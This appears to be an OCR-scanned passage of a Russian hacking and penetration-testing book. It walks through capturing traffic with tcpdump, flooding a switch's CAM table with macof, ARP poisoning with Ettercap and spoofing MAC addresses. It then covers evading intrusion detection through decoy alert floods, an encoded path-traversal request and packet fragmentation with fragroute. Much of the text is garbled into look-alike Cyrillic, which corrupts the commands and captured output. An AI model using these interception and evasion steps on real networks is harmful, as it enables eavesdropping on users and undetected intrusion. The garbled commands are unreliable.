11:46:48.701314 ІР 
агра. (44) 


ІР 


Ііпк-Туре ЕІМ10МВ (ЕТЬегпеТ), сарТиге гіге 262144 ЬуТег 
каіі.57728 > ес2-52-43-198-160.из-мегТ-2.сотрите. атагопамг . сот. 
аск 1406161060, міп 40880, 1еп§ТЬ 0 
ес2-52-43-198-160. иг-мегТ-2.сотриТе.атагопамз. сот. ЬТТрг > 

[.], аск 1, міп 64240, 1еп§ТЬ 0 

каіі.53588 > §аТемау.сІотаіп: 6423+ РТК? 16Ѳ.198.43.52.іп-асІсІг. 

§аТемау.с!отаіп > каіі.53588: 6423 1/0/0 РТК ес2-52-43-198-160. 
атагопамг.сот. (107) 

каіі.53170 > §аТемау.сІотаіп: 29504+ РТК? 129.126.168.192.іп- 

§аТемау.с!отаіп > каіі.53170: 29504 ІМХОотаіп 0/0/0 (46) 
каіі.34133 > §аТемау.сІотаіп: 9564+ РТК? 2.126.168.192.іп-асІсІг. 

§аТемау.с!отаіп > каіі.34133: 9564 МХВотаіп 0/0/0 (44) 
каіі.54070 > ес2-52-32-150-180.из-мегТ-2.сотрите. атагопамг . сот. 
аск 101222386, міп 40880, 1еп§ТЬ 0 
каіі.51078 > §аТемау.сІотаіп: 2872+ РТК? 180.150.32.52.іп-асісіг. 


Гораздо лучше сохранить всю информацию в файл, так как это упростит сбор дан¬ 
ных и создаст возможность для последующего анализа трафика в любое удобное 
для вас время. 

гооТ@ка1і:~# Тсрсіитр -м /гооТ/Тсритр.сар 

Тсрсіитр: ѵегЬоге оиТриТ гирргезгесі, иге -ѵ ог -ѵѵ Тог Тиіі ргоТосоІ сіесосіе 
1ігТепіп§ оп еТН0, Ііпк-Туре ЕКІ10МВ (ЕТЬегпеТ), сарТиге гіге 262144 ЬуТег 
Л С3821 раскеТг сарТигесі 
3828 раскеТг гесеіѵесі Ьу ТіІТег 
0 раскеТг сігорресі Ьу кегпеі 


Для анализа полученных данных можно использовать \ѴЬіге§Ьагк, но раз уж мы 
работаем в консоли, то будем последовательны и приведем пример анализа данных 
в консоли. 

Рассмотрим все ІР-адреса и порты, с которыми происходило соединение: 

гооТ@ка1і:~# Тсрсіитр -п -г /гооТ/Тсритр.сар | амк -Е" " '{ ргіпТ $3}' | гогТ -и | 
ИеасІ 

геасііп§ Тгот Тііе /гооТ/Тсритр.сар, Ііпк-Туре ЕМ10МВ (ЕТЬегпеТ) 

136.243.75.5.80 

138.201.8.34.80 

138.201.8.95.80 

144.76.164.182.80 

144.76.28.230.80 

144.76.62.5.80 

173.194.122.218.80 
173.194.32.186.443 
178.250.0.80.80 

178.250.2.77.80 
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Проанализировав вывод, мы можем увидеть, на какие адреса чаще всего уходили 
запросы. Теперь отфильтруем трафик, исходя из имеющейся у нас информации. 

пооТ@ка1і:~# Тсрсіитр -п зге НозТ 138.201.8.34 -г /гооГ/Тсритр.сар 
геасІіп§ Ггот Тііе /гооТ/Тсритр.сар, Нпк-Туре ЕМ10МВ (ЕТНегпеТ) 

11:59:01.590002 ІР 138.201.8.34.80 > 192.168.126.129.44236: Р1а§5 [5.], зея 
1793877133, аск 236733408, міп 64240, орТіопз [тзз 1460], 1еп§ГН 0 
11:59:01.594853 ІР 138.201.8.34.80 > 192.168.126.129.44238: Р1а§5 [$.], зер 
1094285691, аск 3332638160, міп 64240, орТіопз [тзз 1460], 1еп§ТН 0 
11:59:01.594994 ІР 138.201.8.34.80 > 192.168.126.129.44236: Р1а§5 [.], аск 1461, 
міп 64240, 1еп§ТН 0 

11:59:01.595001 ІР 138.201.8.34.80 > 192.168.126.129.44236: Р1а§5 [.], аск 1537, 
міп 64240, 1еп§ТН 0 


пооТ@ка1і:~# Тсрсіитр -п сізГ РіозТ: 138.201.8.34 -г /гооГ/Тсритр.сар 
геасІіп§ Ггот Тііе /гооТ/Тсритр.сар, Нпк-Гуре ЕМ10МВ (ЕТНегпеТ) 

11:59:01.475932 ІР 192.168.126.129.44236 > 138.201.8.34.80: Р1а§5 [5], зер 
236733407, міп 29200, орТіопз [тзз 1460,заскОК,Т5 ѵаі 144778 есг 0,пор,мзса1е 7], 
1еп§ТН 0 

11:59:01.476078 ІР 192.168.126.129.44238 > 138.201.8.34.80: Р1а§5 [5], зер 
3332638159, міп 29200, орТіопз [тзз 1460,заскОК,Т5 ѵаі 144778 есг 0,пор,мзса1е 7], 
1еп§ТН 0 

11:59:01.590025 ІР 192.168.126.129.44236 > 138.201.8.34.80: Р1а§5 [.], аск 
1793877134, міп 29200, 1еп§ТН 0 

11:59:01.590665 ІР 192.168.126.129.44236 > 138.201.8.34.80: Р1а§5 [.], зер 
0:1460, аск 1, міп 29200, 1еп§ТН 1460: НТТР: 6ЕТ /Га§?еѵепТ=оТНегРа§е&сНеск=Тг 

ие&_1осаТіоп=НТТр%ЗА%2Р%2Рмим.Тег-Гоиг.сот%2Р&_геГеггег=&_ТіТ1е=%0Ѳ%9Р%01%83%01 

%82%О0%В5%О0%В2%О0%ВА%О0%В8%20%О0%В2%20%О0%93%О1%80%О0%В5%О1%86%О0%В8%О1%8Е%2С%20 

%О0%9А%О0%В8%О0%ВР%О1%80%2С%20%О0%9Е%О0%90%О0%АО%2С%20%О0%А 


пооТ@ка1і:~# Гсрсіитр -п рогѣ 80 -г /пооТ/Тсритр.сар 

геасІіп§ Ггот Тііе /гооТ/Тсритр.сар, Нпк-Гуре ЕМ10МВ (ЕТНегпеТ) 

11:58:57.800214 ІР 192.168.126.129.40306 > 93.184.220.29.80: Р1а§5 [5], зея 
3231467275, міп 29200, орТіопз [тзз 1460,заскОК,Т5 ѵаі 143859 есг 0,пор,мзса1е 7], 
1еп§ТН 0 

11:58:57.902747 ІР 192.168.126.129.40308 > 93.184.220.29.80: Р1а§5 [5], зер 
3445184571, міп 29200, орТіопз [тзз 1460,заскОК,Т5 ѵаі 143884 есг 0,пор,мзса1е 7], 
1еп§ТН 0 

11:58:57.909838 ІР 93.184.220.29.80 > 192.168.126.129.40306: Р1а§5 [5.], зея 
3702388, аск 3231467276, міп 64240, орТіопз [тзз 1460], 1еп§ТН 0 

11:58:57.909911 ІР 192.168.126.129.40306 > 93.184.220.29.80: Р1а§5 [.], аск 1, міп 
29200, 1еп§ТН 0 

11:58:57.910923 ІР 192.168.126.129.40306 > 93.184.220.29.80: Р1а§5 [Р.], зея 1:430, 
аск 1, міп 29200, 1еп§ТН 429: НТТР: Р05Т / НТТР/1.1 

11:58:57.911421 ІР 192.168.126.129.40310 > 93.184.220.29.80: Р1а§5 [5], зея 
1472664795, міп 29200, орТіопз [тзз 1460,заскОК,Т5 ѵаі 143886 есг 0,пор,мзса1е 7], 
1еп§ТН 0 

11:58:57.914620 ІР 93.184.220.29.80 > 192.168.126.129.40306: Р1а§5 [.], аск 430, 

МІП 64240, 1еп§ТН 0 



Пассивный перехват трафика 127 


Далее рассмотрим информацию, которая передавалась по сети в момент ее захвата. 
В данном случае мы увидим ее в НЕХ-формате, однако это не помешает нам до¬ 
быть нужные данные. 


гооТ@ка1і :~# Тсрсіитр -пХ -г /гооТ/Тсритр.сар 

геас)іп§ Тгот Рііе /гооТ/Тсритр.сар, Ііпк-Туре ЕРІ10МВ (ЕТИетеТ) 

11:58:57.026917 ІР 192.168.126.129.60358 > 192.168.126.2.53: 61944+ А? зеІТ-гераіг . 
то2І11а.ог§. (41) 
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59.459884 ІР 192.168.126.129 

39468 > 194.165.24.241.80: Р1а§5 [Р.] 

аск 1, 

ИІП 29200, 

ІепёТИ 872: НТТР: СЕТ / НТТР/1 
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746-Р 

7572 

2е63 

6“Рбс1 

0с)0а 

ы.Тег-Тоиг.сош.. 

0x0050: 

5573 

6572 

2сІ41 

6765 

6е74 

За20 

4СІ6-Р 

7а69 

І)$ег-А§еп1: : .Могі 

0x0060: 

бсбс 

612-Р 

352е 

3020 

2858 

3131 

ЗЬ20 

4с69 

ІІа/5.0. (XII; .И 

0x0070: 

6е75 

7820 

6936 

3836 

ЗЬ20 

7276 

3а34 

352е 

пих. І686; . гѵ:45 . 

0x0080: 

3029 

2047 

6563 

бЬб'Р 

2-Р32 

3031 

3030 

3130 

0).Сеско/2010010 

0x0090: 

3120 

4669 

7265 

666-р 

782-Р 

3435 

2е30 

0с)0а 

1. Ріге-Рох/45 .0.. 

0Х00Э0: 

4163 

6365 

7074 

За20 

7465 

7874 

2Р68 

746СІ 

АссерТ:.ТехТ/ИТт 

0х00Ь0: 

6с2с 

6170 

706с 

6963 

6174 

696Р 

6е2-р 

7868 

1, аррІісаТіоп/хРі 

0Х00С0: 

746с) 

6с2Ь 

786с) 

6с2с 

6170 

706с 

6963 

6174 

1:т1+хт1,арр11са1: 

0x00(10: 

696-Р 

6е2-р 

786с) 

6сЗЬ 

713с) 

302е 

392с 

2а2-р 

Іоп/хт1;р=0.9,*/ 

0х00е0: 

2аЗЬ 

713сІ 

302е 

380с) 

0а41 

6363 

6570 

742СІ 

*;р=0.8..АссерТ- 

ѲхѲѲ'РѲ : 

4с61 

6е67 

7561 

6765 

За20 

656е 

2с) 55 

532с 

І_апкиаее :. еп-1)5, 

0x0100: 

656е 

ЗЬ71 

3с)30 

2е35 

0с)0а 

4163 

6365 

7074 

еп;р=0. 5..АссерТ 

0x0110: 

2с)45 

6е63 

6-Р64 

696е 

673а 

2067 

7а69 

702с 

-Епсосііпе: .Е2Ір, 

0x0120: 

2064 

6566 

6с61 

7465 

0с)0а 

436Р 

б^бЬ 

6965 

. с)е-Р1аТе.. Соокіе 




И вот мы нашли интересующее нас соединение с ѣег-іоиг.сот. Но данных все равно 
много. Чтобы упростить задачу, воспользуемся встроенным фильтром заголовков. 
Нас будут интересовать только пакеты с флагами Р5Н и АСК. 
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СІюсКьиш 

ІІіуегіІ Роіміе» 
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Рис. 8.8. Стркутура заголовка сегмента ТСР 
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На представленной выше схеме видно, что интересующие нас флаги А и Р нахо¬ 
дятся в четвертой и пятой позиции, а это значит, что в двоичном формате это будет 
иметь вид 00011000, а в десятичном — 24. 

Посмотрим, как теперь будет выглядеть фильтр: 

гооі@ка1і:~# ісрсіитр -А -п ’"Сер[ 13] = 24' -г /гооі/ісритр.сар 

11:59:00.459252 ІР 192.168.126.129.49290 > 144.76.62.5.80: Р1а§5 [Р.], зея 
2487328431:2487328798, аск 1891911515, міп 29200, 1еп§ТІі 367: НТТР: СЕТ /меЬіт/ 
Ьиііоп.рНр НТТР/1.1 

Е.@.@. .". .-. .!>_Р. А. ,р.6[Р.г. : . . .СЕТ /меЬіт/Ьиііоп .рНр НТТР/1.1 

Нозі: іегіоигсот.меЬіт. ги 

11зеп-А§еп1:: Мо2І11а/5.0 (XII; Ипих І686; гѵ:45.0) Сеско/20100101 ЕігеГох/45.0 

Ассері : іта§е/рп§,іта§е/*;я=0. 8, */*;я=0.5 

Ассері-Еап§иа§е: еп-115,еп;я=0.5 

Ассері-ЕпсосІіп§: §гір, сІе-РІаіе 

КеРегег: НТТр://ммм.іег-іоиг. сот/ 

Соппесііоп: кеер-аііѵе 

ІГ-Иопе-МаТсН: "2сІаеаа8Ь5Г19Г0Ьс209сІ976с02Ьсі6асЬ51Ь00Ь0а" 


11:59:00.563800 ІР 144.76.62.5.80 > 192.168.126.129.49290: Р1а§5 [Р.], зер 1:276, 
аск 367, міп 64240, Іепе-ЬГі 275: НТТР: НТТР/1.1 200 ОК 

Е . .; р.Е>. . .Р. .р.6[.А. .Р.НТТР/1.1 200 ОК 

5егѵег: п§іпх 

Раіе: ТНи, 10 Иоѵ 2016 16:58:59 6МТ 
Сопіепі-Туре: іта§е/§іГ 
Сопіепі-ІепёіН: 43 
Соппесііоп: кеер-аііѵе 
Х-ІдІеЬіт-Ѵегзіоп: 8.14.142 

Еіа§: "2сіаеаа8Ь5Г19-р0Ьс209сІ976с02ЬсІ6асЬ51Ь00Ь0а" 

Х-Тіте: 0.000 

6ІР89а.!.,.Р. .; 

11:59:00.839316 ІР 192.168.126.129.54060 > 81.222.128.23.80: Р1а§5 [Р.], зер 
3867682114:3867682536, аск 387532615, міп 29200, 1еп§1:Іі 422: НТТР: СЕТ /с§і-Ьіп/ 
егіе. с§і?зіс!=204602&Ьі:=62&си5І:от=153%ЗОи5ег_і<І&рІ'і=1&гпсІ=346920&1:аі1256=ипкпоип 
НТТР/1.1 

Е.@.@..р..~.()....,.Р..%В. .ССР. г. - V. .СЕТ /с§і-Ьіп/еп1е. с§і?зісІ=204602&Ы:=62&си5І: 

от=153%ЗРизеп_іс1&рН=1&гпсІ=346920&і:аі1256=ипкпоип НТТР/1.1 
Нозі: асі. асігіѵег. ги 

11зер-А§епТ : Мо2І11а/5.0 (XII; Ипих І686; гѵ:45.0) беско/20100101 РігеГох/45.0 
Ассері: */* 

Ассері-Еап§иа§е: еп-115,еп;я=0.5 
Ассері-ЕпсосІіп§: §гір, сІе-РІаіе 
КеГегег: Ыір: //ммм.іег-іоиг. сот/ 

Соокіе: сісІ=АРіКІІ-кпіКН](2ІлІрЕмсІ0сі1УрА; аг_§2=1; аг_§о=1; 1сІ=1; аг_огсІ=1; аг_уа=1 
Соппесііоп: кеер-аііѵе 


Теперь информация представлена в более понятном и удобном для анализа виде, 
не так ли? 
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Активный перехват 

Итак, мы рассмотрели модель сети, в которой весь трафик идет не только от точки 
отправки до точки назначения, но и доходит до нашего интерфейса. Теперь рас¬ 
смотрим ситуацию, в которой атакующий получает доступ к одному из портов 
свича. В данной ситуации неважно, получен доступ к самому свичу или же это 
сетевая розетка, подключенная к сетевому оборудованию, находящемуся в другом 
помещении. Важно лишь то, что на сетевой интерфейс приходят только те пакеты, 
которые должны приходить, и никакие больше. 

Одним из самых популярных способов обойти такую защиту и заставить свич 
работать как хаб, что позволит нам перехватывать весь сетевой трафик, является 
переполнение САМ-таблицы. 

Все САМ-таблицы имеют конечную величину и содержат такие данные, которые 
помогают направлять нужный трафик нужным клиентам, а именно МАС-адреса, 
номер порта и информацию о принадлежности к ѴЬА№ 

Переполнение этой таблицы приводит к тому, что свич больше не может обра¬ 
батывать данные в нормальном режиме, и для того, чтобы обеспечить клиентам 
минимальный уровень сервиса, он перестает читать САМ-таблицу и начинает 
работать как хаб. 

Необходимо учесть, что переполнение таблицы — процесс непрерывный, и вскоре 
после того, как он прекратится, САМ-таблица будет очищена и он вернется к нор¬ 
мальному режиму функционирования. 

Для проведения атаки, направленной на переполнение САМ-таблицы МАС- 
адресами, достаточно одной команды: 

гооТ@ка1і :~# тасоР 

Ь2:Р9:9е:6Ь:59: Ь4 69:69:Р4:1: сі :7сІ 0.0.0.0.17507 > 0.0.0.0.49697: 5 
1870663496:1870663496(0) иіп 512 

6Ь:сІР:е5:9:а8:1е с9:9с : ЗсІ :4Ь:21 :сІ0 0.0.0.0.14408 > 0.0.0.0.45120: 5 
2106903632:2106903632(0) иіп 512 

8:80:82:19:60:ес СІ4:Р7:РЬ:14:47:Р5 0.0.0.0.13022 > 0.0.0.0.2854: 5 
708293972:708293972(0) міп 512 

53 : сі4: 80:73: сіс : с4 сІ2:сІсІ:5Ь:2с1:32:ЬЗ 0.0.0.0.5752 > 0.0.0.0.1613: 5 
1815033319:1815033319(0) міп 512 

сЗ : а0: 33: 5Ь: 67: 8Ь 58: сіб : 8Р: 5сІ :Рсі : 63 0.0.0.0.975 > 0.0.0.0.37840: 5 
1285237419:1285237419(0) міп 512 

81:86:99 :13: сІ2 :10 8Р:37:86:2:еа:аб 0.0.0.0.30380 > 0.0.0.0.47351: 5 
447067260:447067260(0) міп 512 

ее: сіР : сісі : 2Р :Р5 :96 8Ь:62:89:38:Ра: Іа 0.0.0.0.31470 > 0.0.0.0.57504: 5 
1107960129:1107960129(0) міп 512 

1Р:сІб:с1:1Р:42:сІР 2сІ : Ьа : Зе: бе : са : 29 0.0.0.0.28879 > 0.0.0.0.18191: 5 
753232608:753232608(0) МІП 512 

Іа :93 :а9 :1: еі :31 2а: Іа :М: 5е :сІ8 :се 0.0.0.0.4821 > 0.0.0.0.53112: 5 
437165546:437165546(0) МІП 512 
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Еще один способ — это «отравление» АКР. АКР-таблицы на маршрутизаторах — 
и не только — используются для сопоставления ІР и МАС-адресов, что позволяет 
свичам выбирать наиболее эффективный путь прохождения трафика. Для нас 
важно то, что широковещательные пакеты, используемые для построения этой 
таблицы, никаким образом не фильтруются и являются широковещательными. Ис¬ 
пользуя эту особенность, атакующий может рассылать по сети поддельные данные 
и превратить свой компьютер в хаб. 

Продемонстрируем на примере Ейегсар. Выберем тип сниффинга (8піН —> I 'п і Іі е<1 
5піШп§„.) и интерфейс, с которым мы будем работать (еіЬО) (рис, 8.9). 


е&егсар 0.8.2 О 0 О 


Рііе 5гШ ОріюпБ ІпГо 



Рис. 8.9. Выбор типа сниффинга в Ейегсар 


Просканируем сеть на доступные хосты (Нозіз —» 5сап Гог Іюзіз) (рис. 8.10). 

Затем осмотрим список доступных хостов (Нозіз —» Нозіз НзГ). Теперь можно пойти 
двумя путями: или начать атаку на все машины в сети, и тогда не нужно ничего 
выбирать, или же указать интересующие нас цели. В нашем случае мы отметили 
роутер как цель номер 1 и один из компьютеров как цель номер 2 (рис. 8.11). 

Теперь начнем атаку, выбрав из верхнего меню Еиегсар МІТМ —> АКР роізопіп§ 
(рис. 8.12). 
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екегсар 0.8.2 О Ф О 

5*ап ТагдеіБ Нобіб Ѵіеѵ/ Мііт Ріііѳгб Ьоддіпд Ріидіп* Іп*о 


Новь ііы сиі+н 

ЕпаЫс ІРѵб 5сап 



70.188 пін( ѵріиіш Гіпунг [ігіпі 
1766 Іср 05 Йпдегргіп* 

2182 кпоѵѵп 5сгѵісс5 

Ыа: по 5сгірІ5 члгеге БресіІіеР, по* Біагііпд ир! 
5*аг*Іпд ІІпМесІ БПІГСІпд... 


Рис. 8.10. Запуск сканирования на предмет доступных хостов 



Рис. 8.11. Просмотр целей для атаки (Тагдей -> Сиггепі Іагдеіз) 
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. ...... — -- 

еПегсар 0.8.2 © © © 

ЫаД I агцеІ5 Н05І5 Ѵіеѵѵ МіОп Н11ег5 Ьоццтд Р1идіп5 ІпТо 
Ноя ЦЯ * Іагдей * 



АКР ровопіпд ѵісііт;: 

6КОЦР 1:192.168.126.100:50:56:60:00:08 
СКОЦР 2:192.168.126.2 00:50:56:13:01:63 


Рис. 8.12. Начало атаки 


Следует упомянуть еще одну проблему. Важно учесть, что, скорее всего, даже если 
вы и получите доступ к одному из сетевых портов, то все равно не сможете проник¬ 
нуть в сеть, поскольку все современные коммутаторы могут контролировать доступ 
по МАС-адресам. Однако у вас всегда остается возможность поменять МАС-адрес 
своего компьютера следующим образом: 

гоо1:@ка1і:~# іРсоп-Рі§ еТИЭ сіоід/п 
гоо1:@ка1і:~# тассІіап§ег -г еТІіѲ 
СиггепТ МАС: 00:0с:29:9а:54:а5 (ѴМмаге, Іпс.) 

Регтапепі МАС: 00:0с:29:9а:54:а5 (ѴМиаге, Іпс.) 

№і«і МАС: 6а :66: Ь0:89:аГ:63 (ипкпомп) 

гоо1:@ка1і:~# іГсопГі§ еТИЭ ир 


Резюме 

Для того чтобы перехватывать информацию, или сниффить, вам будет нужен се¬ 
тевой адаптер, специальные драйверы (со стандартными драйверами у вас вряд ли 
выйдет что-то сделать) и ПО, например \ѴІіігезЬагк. 

Помните, что существует два типа сетей. В одних все проходящие данные доступ¬ 
ны всем пользователям, а в других — только адресату. К первому типу относятся 
беспроводные сети и сети, построенные с использованием хабов, в этом случае 
































Резюме 133 


перехват данных не представляет сложностей. Вам надо установить нужный 
драйвер и запустить сниффер, который будет собирать весь проходящий трафик. 

Ко второму типу относятся сети, построенные с помощью свичей. Чтобы перехва¬ 
тывать трафик на свичах, необходимо получить доступ ко всем проходящим через 
него данным. Один из способов этого добиться — переполнить САМ — таблицу 
свича МАС-адресами. 

Используя широковещательные пакеты, можно изменить АКР-таблицу компьюте¬ 
ра жертвы и свича. Они будут воспринимать ваше устройство как часть сети, и весь 
трафик пойдет через вас, останется только собрать его! 

Все полученные сетевые данные очень неудобны для чтения, однако \УЫгезЬагк 
содержит мощные инструменты для фильтрации. Изучите и используйте их, чтобы 
в огромном массиве данных найти интересующую вас информацию. 

Помните о том, что бывает недостаточно просто подключиться проводом к свичу: 
возможно, чтобы он пустил вас в сеть, вам будет необходимо изменить МАС-адрес 
своей сетевой карты. 
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В предыдущих главах этой книги мы уже рассмотрели различные варианты атак на 
информационные системы, однако для их успешной реализации необходимо одно 
условие — чтобы цель никто не защищал. В реальной жизни это не так. 

Крупные организации нанимают специалистов по информационной безопасности 
и закупают специальные системы, основная цель которых — предотвращение не¬ 
санкционированного доступа. Внутреннюю сеть обычно защищают системы обна¬ 
ружения и предотвращения атак, брандмауэры и различные приманки. 

В этой главе мы рассмотрим основные методы защиты сети и варианты их обхода. 

Системы обнаружения атак 

Система обнаружения атак (Ш$) — это специализированное программное или 
аппаратное решение, анализирующее сетевой трафик сети или определенного хоста 
с целью обнаружения и идентификации атаки. 

По сути, такая система перехватывает сетевой трафик и передает его на свой анали¬ 
затор. Анализатор сверяет его со своей базой данных, в которую занесены основные 
маркеры векторов атак, и, в случае обнаружения атаки, оповещает об этом другие 
системы и администратора. 

Однако системы обнаружения атак могут не ограничиваться анализом сетевого 
трафика. Существуют решения, которые позволяют отслеживать активность про¬ 
цессов отдельных хостов, анализировать журналы аудитации, а также проверять 
целостность файлов на случай, если кто-то попытается внедрить в них какой-либо 
зловредный код. 

Теперь рассмотрим основные варианты обнаружения атак такими системами. 

Распознавание сигнатур является одним из основных методов обнаружения. Си¬ 
стема сравнивает входные данные с записями из своей базы данных и в случае сов- 
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падения сообщает об этом администратору. Основным недостатком такого подхода 
является его ограниченность. Для того чтобы остаться незамеченным, атакующему 
достаточно изменить самую незначительную составляющую своего вектора атаки. 

Второй метод заключается в поиске аномалий. Система в течение продолжитель¬ 
ного периода времени наблюдает за трафиком и создает его модель. После того 
как будет создана стандартная модель, все последующие данные будут сравни¬ 
ваться с ней. В случае, если новые данные не вписываются в стандартную модель, 
система оповестит администратора. Данный способ также имеет свои недостатки. 
Первый — это возможность множества ложных срабатываний. Второй состоит 
в том, что атакующий, совершая определенные однотипные действия в течение 
длительного времени, может изменить модель, и в последующем такие действия 
будут рассматриваться как нормальные. 

Третий вариант обнаружения атаки — аномалии протокола. В данном случае си¬ 
стеме известны спецификации каждого протокола и правила, по которым он дол¬ 
жен использоваться. Преимущество такого подхода состоит в том, что стандарты 
меняются довольно редко, и администратору не нужно регулярно обновлять базу 
данных. Однако проблемы возникают тогда, когда в сети появляется оборудование 
с другой реализацией определенного сетевого протокола. В таком случае админи¬ 
стратору приходится отключать данный метод обнаружения или очень тонко его 
настраивать, что требует достаточно глубоких и специфичных знаний. 

Что же конкретно могут отслеживать системы обнаружения атак? Изменения 
в файловой системе: появление новых файлов, появление новых директорий, 
изменения прав доступа, изменения файлов, файлы с неизвестным расширением, 
зашифрованные файлы, изменения атрибутов. Сетевые атаки: увеличение сетевого 
трафика, появление нового сетевого трафика, попытки удаленной авторизации. 
Непрямые признаки: исчезновение журналов аудитации, перезагрузки системы, 
появление новых процессов, попытки авторизации с несуществующим именем 
пользователя, подключения в нерабочее время, повышенное использование си¬ 
стемных ресурсов. 

Теперь остановимся подробнее на методах обхода систем обнаружения атак. 

Отказ в обслуживании. Позволяет полностью или временно отключить систему 
обнаружения атак. В данном случае можно использовать практически любую из 
атак, направленных на отказ в обслуживании. 

Но не обязательно вызывать классический отказ в обслуживании. Можно сделать 
и так, чтобы данной системой, несмотря на то что она работает и справляется с на¬ 
грузкой, невозможно было пользоваться. Для этого необходимо заставить ее об¬ 
наруживать огромное количество атак. Например, запустить множество скриптов, 
которые будут пытаться проводить 801.-инъекции. В это время атакующий может 
совершать совершенно другие действия. И даже если его активность будет замечена 
системой, администратор, скорее всего, не заметит ее среди тысяч других событий, 
особенно если она будет такого же типа. 
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Запутывание. Это изменение данных таким образом, чтобы система обнаружения 
не распознала отправленные данные, а сервис, для которого они предназначаются, 
смог сделать это без проблем. Приведем пример, в котором первый запрос будет 
однозначно определен системой обнаружения атак и веб-сервером, а второй прой¬ 
дет незамеченным, но будет воспринят тем же сервером совершенно нормально: 

/с: \иіппТ\ауаТет32\пеТаТаТ .ехе" 

"%2е%2е%2Т%2е%2е%2Тс: \иіппТ\ауаТет32\пеТаТаТ . ехе" 

Фрагментация. Это процесс разбивания пакетов на более мелкие фрагменты. 
Они будут нормально восприниматься хостом-получателем, в то время как 
система обнаружения атак не сможет найти в таких пакетах признаки попытки 
взлома. Хотя некоторые системы могут собирать данные из нескольких пакетов, 
такую защиту легко обойти, растянув атаку во времени, ведь пакеты не могут 
находиться в буфере вечно, и через определенный промежуток времени вся ин¬ 
формация будет стерта. 

Рассмотрим небольшой пример фрагментации трафика при помощи іга§гоиіе. 
Данная утилита перехватывает и изменяет трафик, идущий к определенному хосту. 
Она может осуществлять следующие операции с пакетами: задерживать, повторять, 
фрагментировать, сегментировать, удалять, изменять последовательность и многое 
другое. 

Вначале нам необходимо запустить сам іта^гоиіе: 

гооТ@ка1і:~# Тга§гоиТе -Т /еТс/Гга§гоиТе.сопГ таіі.тусогр.сот 

Затем начнем отправлять данные на хост, который предположительно охраняется 
системой обнаружения атак: 

гооТ@ка1і:~# ріп§ таіі.тусогр.сот 

Р!Ш6 таіі.тусогр.сот (192.168.10.45) 56(84) ЬуТеа оТ сіаТа. 

Теперь (гадгои і:с делает свою работу, а мы наблюдаем и анализируем выходные 
данные. 

гооТ@ка1і:~# Тга@гоиТе --Р /еТс/-Рга@гоиТе.сопГ таіі.тусогр.сот 
Тга§гоиТе: Тср_ае§ -> ір_Тга@ -> ір_с(іа-Н : -> огсіег -> ргіпТ: 

192.168.126.129 > 192.168.10.45: істр: Туре 8 сосіе 0 (Тга§ 11757:24@0+) 

192.168.126.129 > 192.168.10.45: (Тга§ 11757:16@48) 

192.168.126.129 > 192.168.10.45: (Тга§ 11757:16@48) [сіеіау 0.001 та] 

192.168.126.129 > 192.168.10.45: (Тга§ 11757:24@24+) [сіеіау 0.001 та] 

192.168.126.129 > 192.168.10.45: (Тга§ 11757:24@24+) 

192.168.126.129 > 192.168.10.45: істр: Туре 101 сосіе 116 (Тга§ 11757:24@0+) [сіеіау 
0.001 та] 

192.168.126.129 > 192.168.10.45: (Тга§ 11835:16@48) 

192.168.126.129 > 192.168.10.45: істр: Туре 117 сосіе 56 (Тга§ 11835:24@0+) [сіеіау 
0.001 та] 

192.168.126.129 > 192.168.10.45: (Тга§ 11835:24@24+) [сіеіау 0.001 та] 

192.168.126.129 > 192.168.10.45: (Тга§ 11835:24@24+) 
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192.168.126.129 > 
192.168.126.129 > 
192.168.126.129 > 
192.168.126.129 > 
[сіеіау 0.001 та ] 
192.168.126.129 > 


192.168.10.45: 

істр: 

192.168.10.45: 

(-Рга§ 

192.168.10.45: 

(-Рга§ 

192.168.10.45: 

істр: 

192.168.10.45: 

(■Рга§ 


Туре 8 сосіе 0 (-Рга§ 11835:24@0+) 
11835:16@48) [сіеіау 0.001 та] 

11927:24@24+) [сіеіау 0.001 та] 

Туре 67 сосіе 75 (Рга§ 11927:24@0+) 

11927:24@24+) 


Шифрование. Поскольку системам обнаружения необходимо анализировать про¬ 
ходящий трафик, одним из способов не дать им это сделать будет шифрование. 
Данные можно скрыть, используя 55Б, 55Н, ІРЗес. Это прекрасная возможность 
использовать защиту системы против нее самой. 

Например, НТТР5 можно использовать для таких атак, как переполнение буфера, 
ЗОБ-инъекции, раскрытие директорий, перебор паролей и т. д. Поскольку шифро¬ 
вание данных происходит на конечном хосте, данные будут проходить по сети уже 
в зашифрованном виде, что предотвратит их обнаружение. 


Брандмауэры 

Брандмауэры, также известные как фаерволы, являются еще одним способом за¬ 
щиты внутренней сети от атак. Основное их предназначение — это логическое от¬ 
деление внутренней сети от внешней и контроль доступа к элементам своей сети. 
Брандмауэры, как и остальные системы защиты, могут быть как программным 
решением, так и отдельностоящим специализированным оборудованием. 

Как мы уже упомянули выше, брандмауэры находятся на границе сети и контро¬ 
лируют ее. Через них проходит весь сетевой трафик, и именно там реализуется 
политика безопасности предприятия, определяющая, какой вид трафика может 
проходить из внешней сети во внутреннюю и наоборот. Брандмауэры практически 
всегда ведут полную запись всех подключений и при попытке нарушения политики 
безопасности не только не позволяют трафику пройти через границу, но и сообща¬ 
ют об инциденте администратору сети. 

Есть несколько типовых конфигураций брандмауэра: 

1. Бастион — точка, через которую проходит весь входящий и исходящий трафик. 
Здесь происходит контроль по портам, типам и источникам трафика. В этом слу¬ 
чае один интерфейс будет подключен к внутренней сети, а другой — к внешней. 

2. Разделение подсетей — в данном случае на брандмауэре присутствует как мини¬ 
мум три интерфейса. К одному из них подключена внешняя сеть, ко второму — 
внутренняя, а к третьему — ДМ3. Данная конфигурация позволяет разделять 
ресурсы сети, и в случае взлома одного из них другие сегменты окажутся недо¬ 
ступными злоумышленнику. 

3. Многосетевой брандмауэр — к нему подключены, как следует из названия, не¬ 
сколько сетей. Обычно у таких устройств более трех интерфейсов. 
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4. ДМ3 — демилитаризованная зона. Обычно в такой зоне находятся устройства, 
к которым организация хочет разрешить публичный доступ, например почтовые 
и веб-серверы. Она всегда надежно отделена от внутренних ресурсов. 

Принципы работы брандмауэров зависят от применяемого в них способа филь¬ 
трации трафика. 

1. Брандмауэры с пакетной фильтрацией. Самый простой тип, работает на сетевом 
уровне и осуществляет фильтрацию по таким параметрам, как источник и пункт 
назначения трафика, а также тип протокола и номер порта. 

2. Брандмауэры сеансного уровня. Работают на уровне сессии, это более сложный 
уровень проверки с отслеживанием ТСР-рукопожатий. Как правило, такие 
брандмауэры не нацелены на фильтрацию отдельных пакетов, но отслеживают 
весь сеанс соединения. 

3. Брандмауэры уровня приложений анализируют передающуюся по сети инфор¬ 
